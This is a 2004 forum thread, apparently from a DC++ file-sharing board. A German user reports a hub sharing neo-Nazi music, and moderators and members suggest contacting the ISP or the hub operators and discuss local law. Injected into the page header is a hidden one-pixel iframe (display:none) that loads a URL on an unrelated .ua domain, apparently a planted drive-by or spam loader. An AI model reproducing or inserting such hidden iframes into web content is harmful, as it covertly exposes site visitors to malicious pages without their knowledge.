nazis on dc++?

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

matzo

nazis on dc++?

Post by matzo » 2004-03-07 15:07

:shock: What do you think?
I found a Hub called: Volkermord 2 ( German )
And there is no doubt about it ,in this Hub nazis sharing their stuff.
so I´m shocked and don`t know how to contact someone who erases this hub.
Someone out there who has experienced such?

[B]bongretarded

Post by [B]bongretarded » 2004-03-07 15:08

nazi's??? what are they sharing exactly that puts you off so bad?
A friend indeed is a friend in need a friend with weed is better

joakim_tosteberg
Forum Moderator

Post by joakim_tosteberg » 2004-03-07 15:15

Contact their isp.

matzo

Post by matzo » 2004-03-07 15:23

[B]bongretarded wrote:nazi's??? what are they sharing exactly that puts you off so bad?
Okay im a excited ,
but a user in this hub and there are some more,for example shares songs from bands called
Aryan Angels : 88 Sturmsoldaten
and Aryan Rebels : Spirit of 33 -
as everybody knows it was the year Hitler started to take terrible power in Germany.
i didn`t download but i think it is not necessary to be convinced that there are users who can be put off so bad!!!!!!!!!!!.
i am from Germany -i have heard about such often.

Qbert

Post by Qbert » 2004-03-07 16:26

matzo wrote:Aryan Angels : 88 Sturmsoldaten
and Aryan Rebels : Spirit of 33 -
as everybody knows it was the year Hitler started to take terrible power in Germany.
Are these songs illegal in Germany? (Not speaking about file/music sharing, but their content.) Do you believe the hub is located in Germany? Or if these people sharing those files are located in Germany? The reason I'm asking about location is because that's dependent on the laws for the ISP, which I would assume is located in the same place.
matzo wrote:not necessary to be convinced that there are users who can be put off so bad!!!!!!!!!!!.
What does that mean?
matzo wrote:how to contact someone who erases this hub.
Find out if the hub operators want to dissallow these people and activities. Determine the users ISP and their rules and policies, or above all these, laws, and inform their ISP. You could also try the same things with the hub if you want the hub to close.
My Visual Studio .NET 2003 is licensed under my name, and the same for my operating system... What about you?
I surf on an OC3 without limitations, two to be exact, and I'm not joking.